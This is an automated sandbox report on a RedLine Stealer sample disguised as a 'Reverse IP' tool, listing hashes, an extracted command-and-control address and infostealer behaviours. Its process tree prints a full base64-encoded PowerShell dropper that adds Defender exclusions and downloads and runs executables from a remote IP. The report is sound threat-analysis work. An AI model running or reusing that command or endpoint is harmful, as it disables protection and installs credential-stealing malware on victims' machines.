Analysis
-
max time kernel
123s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2022 18:38
General
-
Target
Reverse IP By Mf4Tn.exe
-
Size
9.3MB
-
MD5
086fb3b0ff1e3c6c351bd9e82465d395
-
SHA1
c02cdb69a41e442b7200bb7b1d191e8cd005a015
-
SHA256
f0fb578438edc3150919407abfc8ad167079ec3ac86bc84c3f93b2aa22fc73e8
-
SHA512
b284e55632d2bfea8ae87a36a1f3805b17fa26e944230b9f16b08f50ec93eb29d19d692f1a71c50e63897f4d95f473ab89e0cc3390289d39bc6bf8381ba85116
Malware Config
Extracted
redline
1877
overthinker1877.duckdns.org:60732
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\svchosts.exe family_redline C:\Users\Admin\AppData\Local\Temp\svchosts.exe family_redline behavioral1/memory/1748-163-0x00000000008B0000-0x00000000008E8000-memory.dmp family_redline -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 15 3352 powershell.exe 35 3352 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
svschosts.exesvchosts.exesvchost.exepid process 4860 svschosts.exe 1748 svchosts.exe 4172 svchost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Reverse IP By Mf4Tn.exesvschosts.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Reverse IP By Mf4Tn.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation svschosts.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 76 ipinfo.io 77 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 1200 976 WerFault.exe Reverse IP By Mf4Tn.exe 488 4256 WerFault.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
powershell.exetaskmgr.exesvchosts.exepid process 3352 powershell.exe 3352 powershell.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 1748 svchosts.exe 1748 svchosts.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exetaskmgr.exesvchosts.exedescription pid process Token: SeDebugPrivilege 3352 powershell.exe Token: SeDebugPrivilege 4540 taskmgr.exe Token: SeSystemProfilePrivilege 4540 taskmgr.exe Token: SeCreateGlobalPrivilege 4540 taskmgr.exe Token: SeDebugPrivilege 1748 svchosts.exe Token: 33 4540 taskmgr.exe Token: SeIncBasePriorityPrivilege 4540 taskmgr.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
Processes:
taskmgr.exepid process 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe -
Suspicious use of SendNotifyMessage 34 IoCs
Processes:
taskmgr.exepid process 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
Reverse IP By Mf4Tn.exesvschosts.exepowershell.exedescription pid process target process PID 976 wrote to memory of 4860 976 Reverse IP By Mf4Tn.exe svschosts.exe PID 976 wrote to memory of 4860 976 Reverse IP By Mf4Tn.exe svschosts.exe PID 976 wrote to memory of 4860 976 Reverse IP By Mf4Tn.exe svschosts.exe PID 4860 wrote to memory of 3352 4860 svschosts.exe powershell.exe PID 4860 wrote to memory of 3352 4860 svschosts.exe powershell.exe PID 4860 wrote to memory of 3352 4860 svschosts.exe powershell.exe PID 3352 wrote to memory of 1748 3352 powershell.exe svchosts.exe PID 3352 wrote to memory of 1748 3352 powershell.exe svchosts.exe PID 3352 wrote to memory of 1748 3352 powershell.exe svchosts.exe PID 3352 wrote to memory of 4172 3352 powershell.exe svchost.exe PID 3352 wrote to memory of 4172 3352 powershell.exe svchost.exe PID 3352 wrote to memory of 4172 3352 powershell.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Reverse IP By Mf4Tn.exe"C:\Users\Admin\AppData\Local\Temp\Reverse IP By Mf4Tn.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svschosts.exe"C:\Users\Admin\AppData\Local\Temp\svschosts.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAegBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawB4AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQBoAGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdABnAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADMALgA5ADAALgAxADIAOAAuADIANQAzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcALAAgADwAIwB1AG0AcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAbQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AbABxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQApADwAIwBrAGoAcAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACwAIAA8ACMAeABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAbQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB2AGEAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACkAKQA8ACMAbABzAGQAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAMwAuADkAMAAuADEAMgA4AC4AMgA1ADMALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcALAAgADwAIwB1AHcAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAdQB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAdgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAKQA8ACMAeABjAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBoAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAcABwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAcAB4AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwByAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AagB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAaABtAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbAB3AGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAPAAjAGEAcwBrACMAPgA="3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchosts.exe"C:\Users\Admin\AppData\Local\Temp\svchosts.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 15682⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 976 -ip 9761⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 536 -p 4256 -ip 42561⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4256 -s 8361⤵
- Program crash
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\svchosts.exeFilesize
205KB
MD5b3503746bb7f1d30755c9f4a26ce0a2c
SHA12490c2a6b3fad0711993c8bb16aab2d21cefac6f
SHA25690706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300
SHA512142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c
-
C:\Users\Admin\AppData\Local\Temp\svchosts.exeFilesize
205KB
MD5b3503746bb7f1d30755c9f4a26ce0a2c
SHA12490c2a6b3fad0711993c8bb16aab2d21cefac6f
SHA25690706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300
SHA512142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c
-
C:\Users\Admin\AppData\Local\Temp\svschosts.exeFilesize
6KB
MD5732e2530c727f4d8524e2163e02e3365
SHA18ecb098af3335761097a71911e12eb3ca4e5e350
SHA25628cf9214549a31d152776af79a8bcc1d1e7c2e1f0288c8d7615d754fc0d21ceb
SHA5126a2321bd128c404cc7b15613fe974c8368fef4aedd6e6bcf07ca2f2fb2f15d82d442b22769f5202471e29a978da1232a72759e8ba050ff007e950cca9ca6933f
-
C:\Users\Admin\AppData\Local\Temp\svschosts.exeFilesize
6KB
MD5732e2530c727f4d8524e2163e02e3365
SHA18ecb098af3335761097a71911e12eb3ca4e5e350
SHA25628cf9214549a31d152776af79a8bcc1d1e7c2e1f0288c8d7615d754fc0d21ceb
SHA5126a2321bd128c404cc7b15613fe974c8368fef4aedd6e6bcf07ca2f2fb2f15d82d442b22769f5202471e29a978da1232a72759e8ba050ff007e950cca9ca6933f
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
14KB
MD51937d5a853734874a0ef18d4acc43113
SHA137c4f8d0c6fea50f836c0a308b06de910205189a
SHA25688e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64
SHA512e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28
-
C:\Users\Admin\AppData\Roaming\svchost.exeFilesize
14KB
MD51937d5a853734874a0ef18d4acc43113
SHA137c4f8d0c6fea50f836c0a308b06de910205189a
SHA25688e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64
SHA512e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28
-
memory/976-133-0x00000000000C0000-0x0000000000A08000-memory.dmpFilesize
9.3MB
-
memory/1748-167-0x00000000051B0000-0x00000000051EC000-memory.dmpFilesize
240KB
-
memory/1748-156-0x0000000000000000-mapping.dmp
-
memory/1748-166-0x0000000002AC0000-0x0000000002AD2000-memory.dmpFilesize
72KB
-
memory/1748-168-0x0000000005420000-0x000000000552A000-memory.dmpFilesize
1.0MB
-
memory/1748-165-0x0000000005790000-0x0000000005DA8000-memory.dmpFilesize
6.1MB
-
memory/1748-163-0x00000000008B0000-0x00000000008E8000-memory.dmpFilesize
224KB
-
memory/1748-169-0x0000000006630000-0x00000000066A6000-memory.dmpFilesize
472KB
-
memory/1748-170-0x0000000006920000-0x000000000693E000-memory.dmpFilesize
120KB
-
memory/1748-171-0x0000000008190000-0x0000000008352000-memory.dmpFilesize
1.8MB
-
memory/1748-172-0x0000000008890000-0x0000000008DBC000-memory.dmpFilesize
5.2MB
-
memory/3352-143-0x00000000067B0000-0x00000000067CE000-memory.dmpFilesize
120KB
-
memory/3352-142-0x00000000060E0000-0x0000000006146000-memory.dmpFilesize
408KB
-
memory/3352-152-0x0000000007E10000-0x0000000007E2A000-memory.dmpFilesize
104KB
-
memory/3352-153-0x0000000007E00000-0x0000000007E08000-memory.dmpFilesize
32KB
-
memory/3352-154-0x0000000007E80000-0x0000000007EA2000-memory.dmpFilesize
136KB
-
memory/3352-155-0x0000000008D00000-0x00000000092A4000-memory.dmpFilesize
5.6MB
-
memory/3352-150-0x0000000007D20000-0x0000000007DB6000-memory.dmpFilesize
600KB
-
memory/3352-149-0x0000000007AD0000-0x0000000007ADA000-memory.dmpFilesize
40KB
-
memory/3352-137-0x0000000000000000-mapping.dmp
-
memory/3352-148-0x0000000007A70000-0x0000000007A8A000-memory.dmpFilesize
104KB
-
memory/3352-147-0x00000000080D0000-0x000000000874A000-memory.dmpFilesize
6.5MB
-
memory/3352-138-0x00000000030D0000-0x0000000003106000-memory.dmpFilesize
216KB
-
memory/3352-146-0x0000000006CD0000-0x0000000006CEE000-memory.dmpFilesize
120KB
-
memory/3352-145-0x000000006F180000-0x000000006F1CC000-memory.dmpFilesize
304KB
-
memory/3352-139-0x0000000005950000-0x0000000005F78000-memory.dmpFilesize
6.2MB
-
memory/3352-144-0x0000000006CF0000-0x0000000006D22000-memory.dmpFilesize
200KB
-
memory/3352-151-0x0000000007DC0000-0x0000000007DCE000-memory.dmpFilesize
56KB
-
memory/3352-141-0x0000000006070000-0x00000000060D6000-memory.dmpFilesize
408KB
-
memory/3352-140-0x0000000005810000-0x0000000005832000-memory.dmpFilesize
136KB
-
memory/4172-164-0x0000000006400000-0x0000000006492000-memory.dmpFilesize
584KB
-
memory/4172-161-0x0000000000F80000-0x0000000000F8A000-memory.dmpFilesize
40KB
-
memory/4172-158-0x0000000000000000-mapping.dmp
-
memory/4860-134-0x0000000000000000-mapping.dmp